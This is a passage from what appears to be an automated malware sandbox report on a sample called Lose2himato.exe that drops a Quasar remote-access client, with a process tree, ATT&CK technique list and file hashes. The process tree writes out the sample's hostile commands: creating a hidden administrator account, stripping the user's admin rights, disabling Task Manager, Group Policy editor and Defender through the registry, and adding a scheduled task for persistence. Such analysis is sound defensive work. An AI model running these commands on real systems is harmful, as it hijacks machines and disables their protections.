    - System Location Discovery: System Language Discovery
    PID:5416
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:6024
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    PID:5808
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
      4⤵
      PID:1748
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffae5c746f8,0x7ffae5c74708,0x7ffae5c74718
        5⤵
        
        PID:3344
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD
      4⤵
      PID:4328
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae5c746f8,0x7ffae5c74708,0x7ffae5c74718
        5⤵
        
        PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
  2⤵
  PID:6016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
  2⤵
  PID:1004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5664 /prefetch:8
  2⤵
  PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6432 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:1
  2⤵
  PID:2800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7480 /prefetch:1
  2⤵
  PID:2100
- C:\Users\Admin\Downloads\Lose2himato.exe
  "C:\Users\Admin\Downloads\Lose2himato.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:5564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add
    3⤵
    PID:5456
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:5424
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1416
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO Test
      4⤵
      PID:1884
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO Test
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:224
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "OWN3DbyHXM4TO" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:3644
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5248
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:3520
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:1536
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
        5⤵
        
        PID:5504
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6056
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5124
- - C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe
    "C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3868
  - - C:\Windows\system32\SubDir\Client.exe
      "C:\Windows\system32\SubDir\Client.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SendNotifyMessage
      PID:4548
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wMEVp9Hbbepe.bat" "
        5⤵
        
        PID:1536
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:5192
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3804
      - C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:5628
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JmmNnun3MKwW.bat" "
        7⤵
        
        PID:3996
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5724
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6068
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1200
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2696
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5768
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5424
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3856
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4256
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4656
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      4⤵
      PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
      4⤵
      PID:1280
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae5c746f8,0x7ffae5c74708,0x7ffae5c74718
        5⤵
        
        PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD
    3⤵
    PID:2784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD
      4⤵
      PID:5844
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0xfc,0x100,0x7c,0x104,0x7ffae5c746f8,0x7ffae5c74708,0x7ffae5c74718
        5⤵
        
        PID:3956
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c shutdown /r
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1748
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7152 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
  2⤵
  PID:5444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:1
  2⤵
  PID:1884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7492 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7756 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
  2⤵
  PID:6140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1904 /prefetch:1
  2⤵
  PID:4148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7752 /prefetch:1
  2⤵
  PID:1068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5428 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6016

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2960

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3376

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5636

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2cc 0x4f8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3252

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3fc4055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

Filesize
2KB

MD5
8f0271a63446aef01cf2bfc7b7c7976b

SHA1
b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7

SHA256
da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c

SHA512
78a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\better.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8749e21d9d0a17dac32d5aa2027f7a75

SHA1
a5d555f8b035c7938a4a864e89218c0402ab7cde

SHA256
915193bd331ee9ea7c750398a37fbb552b8c5a1d90edec6293688296bda6f304

SHA512
c645a41180ed01e854f197868283f9b40620dbbc813a1c122f6870db574ebc1c4917da4d320bdfd1cc67f23303a2c6d74e4f36dd9d3ffcfa92d3dfca3b7ca31a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
34d2c4f40f47672ecdf6f66fea242f4a

SHA1
4bcad62542aeb44cae38a907d8b5a8604115ada2

SHA256
b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33

SHA512
50fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
202KB

MD5
6ed073c9bc4eeba5573ee513dfcca68d

SHA1
f49651f8d6f747cf695913cba3e7c32ac2a4a514

SHA256
b619ab8e8de3553d3dc640c641999bcb5b6c42458dd824a87ccbd11adcae25e2

SHA512
6ac32f85bc5348b236ee770e5f800f07bc80c25f8962c67dcdc0f36d7e296698ed718d9191f1978e6aea6a05e3514365c3697db3c7cd48f67290cec5cddcb2a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
288KB

MD5
efee06987ff605b8a89fc4a3a05b3af1

SHA1
7926237d7bef29e3bcff17162661d891c77eef52

SHA256
d69bd7b5c7e92ffcf5a3dff4549af75002df6c0e4857b607bfb74b815085c353

SHA512
4784a719643f76523663a740282e24863582b913a8e785ab0a6920f73149502f6e7621c9eb2cd0da721543b939dd40fea129c02b65af9d5ed6d519a1af4ad301

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
3.5MB

MD5
8fb7635cb22d312777e9da35b335c129

SHA1
272b0ef0c1674a4e8000acb2a2054868eed77baa

SHA256
25e26ab83ada623b316ff40001844df8f45aa3b72047e2d424f5bdfb4ae01a98

SHA512
04e45dac52ab305b0a6343ee6977574399b56cb1358a2f55af9ec213a69dbe7c1da9f8b434898ad5d8a273bf66e9f1b3f1d5d4b22980e1c3ca50ebe4b807271c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
227KB

MD5
39b7f67f134b243273c882f578dec428

SHA1
ae1645f4ece9bfa964cb88f3a892723bcb7be7b3

SHA256
3fdd19cc6e44f76c1582f1525583d70cd83933f8d5f1d4414ab9db12ee29636b

SHA512
cb2f2a63a5212707fa0975c6ff1b8ae017696502058f81e7932af5a03029216afbb58c6582342a396dd116f63547e7eb598d6ca61a3508c4979593a3329a9fda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
149KB

MD5
7c76116361d784e2a4e9bd43e9e4c958

SHA1
627dcedbca16973fab37963eb906f7ed10fabb8e

SHA256
3aa59246413c78071fa09122f3357c081a7b33f85a7afa440f41e39ba1b624b1

SHA512
59fdc68015fb70a2a274d601b513427d146cae544107bcfac7870b81cf30a4c150389e2583ef444a917ec2b641f8984861f508aab455def4c8c23559f4d8e3c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
369KB

MD5
a0ec8db3541b6bf94d8896048a52821e

SHA1
5895577f89a861ccd852a294658b17bd40d1d579

SHA256
